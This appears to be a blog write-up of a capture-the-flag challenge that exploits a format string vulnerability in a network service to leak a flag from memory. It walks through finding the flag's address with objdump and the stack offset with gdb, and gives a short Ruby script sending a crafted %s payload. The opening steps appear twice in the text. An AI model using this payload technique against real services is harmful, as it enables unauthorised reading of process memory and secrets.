Task:
Our attack will consist of the following steps:
1) locate target string to print
2) locate our input on the stack. Calculate argument number.
3) input address from step 1 and valid %s parameter to read the key.
Firstly, we have to find our target. There is a string located in the .bss segment that stored the flag that was read from file. We can obtain it's address using objdump -t sweet. It's 0x0804b0c0 .
Secondly, we will locate our input using gdb. Let's set breakpoint somewhere in serve function, enable child debugging after fork (set follow-fork child). Then print approximate $esp and a lot of values on the stack to locate your input. You can calculate the offset without printing stack but that will require some math and assembly skills :) . In my case $esp was 0xffffd510 and input was located at the 0xffffd51c . After testing near values it is shown that 265 argument is 4-byte dword from our input.
So all we have to do is to change address.
Script that do the work:
This service accepts our input and echoes it using variant of printf function. As you might have already understood there will be a format string vulnerability.nc ctf.sharif.edu 15478
Our attack will consist of the following steps:
1) locate target string to print
2) locate our input on the stack. Calculate argument number.
3) input address from step 1 and valid %s parameter to read the key.
Firstly, we have to find our target. There is a string located in the .bss segment that stored the flag that was read from file. We can obtain it's address using objdump -t sweet. It's 0x0804b0c0 .
Secondly, we will locate our input using gdb. Let's set breakpoint somewhere in serve function, enable child debugging after fork (set follow-fork child). Then print approximate $esp and a lot of values on the stack to locate your input. You can calculate the offset without printing stack but that will require some math and assembly skills :) . In my case $esp was 0xffffd510 and input was located at the 0xffffd51c . After testing near values it is shown that 265 argument is 4-byte dword from our input.
So all we have to do is to change address.
Script that do the work:
require "socket"
(265..265).each do |arg|
sock = TCPSocket.new("ctf.sharif.edu", 15478)
sock.puts(("\xc0\xb0\x04\x08%#{arg}$08x - %#{arg}$s"))
puts "ARG: #{arg}"
1.times do
result = sock.gets
puts result
end
sock.close
sleep(1)
end
Same here. I've lost a key, but it was some md5 :) .
No comments:
Post a Comment